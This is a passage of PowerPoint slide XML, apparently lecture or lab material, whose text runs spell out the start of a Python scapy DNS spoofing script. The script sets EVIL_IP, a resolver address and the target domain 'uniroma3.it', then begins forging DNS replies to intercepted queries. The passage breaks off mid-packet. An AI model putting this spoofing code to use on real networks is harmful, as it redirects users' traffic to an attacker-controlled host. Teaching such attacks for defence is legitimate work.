            <a:off x="1103922" y="1429205"/>
            <a:ext cx="10478478" cy="4723944"/>
            <a:chOff x="126" y="3327"/>
            <a:chExt cx="5943" cy="759"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="AutoShape 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30C501C1-9456-8B25-FC54-6F86D5FE5F0E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="126" y="3360"/>
              <a:ext cx="5943" cy="726"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw dist="107763" dir="2700000" algn="ctr" rotWithShape="0">
                <a:schemeClr val="bg2"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none"/>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endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>from </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>scapy.all</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> import DNSQR , DNS , IP , UDP , DNSRR , </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>send</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> ,sniff , </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>Ether</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> , </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>sendp</a:t>
              </a:r>
              <a:endParaRPr lang="it-IT" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>EVIL_IP = "210.0.3.50"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>DNS_UNI_IP = "110.0.0.10"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>INTERFACE = "eth0"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>TARGET_DOMAIN = "uniroma3.it"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>def</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dns_spoof</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pkt</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>):</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>if</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pkt.haslayer</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>(DNSQR) and </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pkt</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[DNS].</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>qr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> == 0 and </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pkt</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[IP].</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dst</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> == DNS_UNI_IP:        </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>        </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>qname</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> = </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pkt</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[DNSQR].</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>qname.decode</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>()</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>        </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>if</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> TARGET_DOMAIN in </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>qname</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>:</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>            </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ether_layer</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> = </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>Ether</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dst</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>=</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pkt</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>Ether</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>].</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>src</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>src</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>=</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pkt</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>Ether</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>].</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dst</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>)</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>            </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ip_layer</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> = IP(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>src</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>=</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pkt</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[IP].</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dst</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dst</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>=</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pkt</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[IP].</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>src</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>)</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>            </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>udp_layer</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> = UDP(sport=</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pkt</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[UDP].</a:t>
              </a:r>
              <a:r>
